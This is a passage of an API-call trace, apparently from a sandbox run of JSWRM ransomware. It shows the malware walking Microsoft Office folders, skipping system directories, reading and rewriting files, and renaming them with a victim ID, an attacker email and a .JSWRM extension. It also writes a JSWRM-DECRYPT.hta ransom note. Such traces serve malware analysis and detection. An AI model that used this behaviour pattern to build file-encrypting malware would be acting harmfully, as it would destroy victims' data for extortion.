0x22d0a0 [0112.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0112.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0112.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0112.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.859] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\visiomui.msi.16_visiomui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0112.860] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cb00, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="wordmui.msi.16_wordmui.mcxml", cAlternateFileName="WORDMU~1.MCX")) returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2=".") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="..") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="...") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="windows") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="recovery") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="perflogs") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="documents and settings") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="system volume information") returned 1 [0112.860] lstrcmpiW (lpString1="wordmui.msi.16_wordmui.mcxml", lpString2="msocache") returned 1 [0112.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wordmui.msi.16_wordmui.mcxml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wordmui.msi.16_wordmui.mcxml", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wordmui.msi.16_wordmui.mcxml", lpUsedDefaultChar=0x0) returned 28 [0112.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wordmui.msi.16_wordmui.mcxml", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0112.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wordmui.msi.16_wordmui.mcxml", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wordmui.msi.16_wordmui.mcxml", lpUsedDefaultChar=0x0) returned 28 [0112.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0112.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0112.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0112.861] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=183040) returned 1 [0112.861] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0112.862] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0112.908] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.908] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0112.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.909] CloseHandle (hObject=0x238) returned 1 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0112.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0112.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0112.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0112.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0112.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.909] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\en-us\\wordmui.msi.16_wordmui.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.911] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cb00, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="wordmui.msi.16_wordmui.mcxml", cAlternateFileName="WORDMU~1.MCX")) returned 0 [0112.911] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0112.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0112.911] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="es-es", cAlternateFileName="")) returned 1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2=".") returned 1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2="..") returned 1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2="...") returned 1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2="windows") returned -1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2="recovery") returned -1 [0112.911] lstrcmpiW (lpString1="es-es", lpString2="perflogs") returned -1 [0112.912] lstrcmpiW (lpString1="es-es", lpString2="documents and settings") returned 1 [0112.912] lstrcmpiW (lpString1="es-es", lpString2="$RECYCLE.BIN") returned 1 [0112.912] lstrcmpiW (lpString1="es-es", lpString2="system volume information") returned -1 [0112.912] lstrcmpiW (lpString1="es-es", lpString2="msocache") returned -1 [0112.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0112.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0112.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0112.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0112.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bc18 [0112.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0112.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\jswrm-decrypt.hta")) returned 0xffffffff [0112.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0112.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0112.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0112.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0112.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b2b8 [0112.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0112.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.914] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.914] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0112.915] CloseHandle (hObject=0x45c) returned 1 [0112.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0112.915] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0112.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0112.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0112.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0112.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0112.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24bc18 [0112.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0112.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\es-es\\jswrm-decrypt.hta")) returned 0x20 [0112.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0112.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0112.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0112.917] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\es-es\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x39f624cf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName=".", cAlternateFileName="")) returned 0x232140 [0112.917] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.917] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x39f624cf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="..", cAlternateFileName="")) returned 1 [0112.917] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.917] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.917] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39f624cf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x39f624cf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x39f624cf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0112.917] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0112.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0112.918] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15392, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Proof.Culture.msi.16_proof.mcxml", cAlternateFileName="PROOFC~1.MCX")) returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2=".") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="..") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="...") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="windows") returned -1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="recovery") returned -1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="perflogs") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="documents and settings") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="system volume information") returned -1 [0112.918] lstrcmpiW (lpString1="Proof.Culture.msi.16_proof.mcxml", lpString2="msocache") returned 1 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Proof.Culture.msi.16_proof.mcxml", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Proof.Culture.msi.16_proof.mcxml", lpUsedDefaultChar=0x0) returned 32 [0112.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0112.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0112.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 